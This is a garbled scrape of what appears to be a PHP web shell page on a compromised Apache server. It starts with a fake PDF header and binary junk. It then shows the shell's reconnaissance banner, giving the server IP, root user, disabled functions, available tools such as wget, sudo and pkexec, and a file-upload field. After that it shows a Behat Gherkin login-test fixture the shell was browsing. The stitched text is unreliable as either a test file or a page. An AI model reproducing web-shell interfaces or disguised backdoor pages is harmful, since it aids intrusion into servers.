%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/egp/vendor/behat/gherkin/tests/Behat/Gherkin/Fixtures/etalons/ |
Upload File : |
feature: title: Login language: en line: 1 description: |- To ensure the safety of the application A regular user of the system Must authenticate before using the app scenarios: - type: outline title: Failed Login line: 7 steps: - { keyword_type: 'Given', type: 'Given', text: 'the user "known_user"', line: 8 } - { keyword_type: 'When', type: 'When', text: 'I go to the main page', line: 10 } - { keyword_type: 'Then', type: 'Then', text: 'I should see the login form', line: 11 } - { keyword_type: 'When', type: 'When', text: 'I fill in "login" with "<login>"', line: 13 } - { keyword_type: 'When', type: 'And', text: 'I fill in "password" with "<password>"', line: 14 } - { keyword_type: 'When', type: 'And', text: 'I press "Log In"', line: 15 } - { keyword_type: 'Then', type: 'Then', text: 'the login request should fail', line: 16 } - { keyword_type: 'Then', type: 'And', text: 'I should see the error message "Login or Password incorrect"', line: 17 } examples: 20: [login, password] 21: ['', ''] 22: [unknown_user, ''] 23: [known_user, ''] 24: ['', wrong_password] 25: ['', known_userpass] 26: [unknown_user, wrong_password] 27: [unknown_user, known_userpass] 28: [known_user, wrong_password]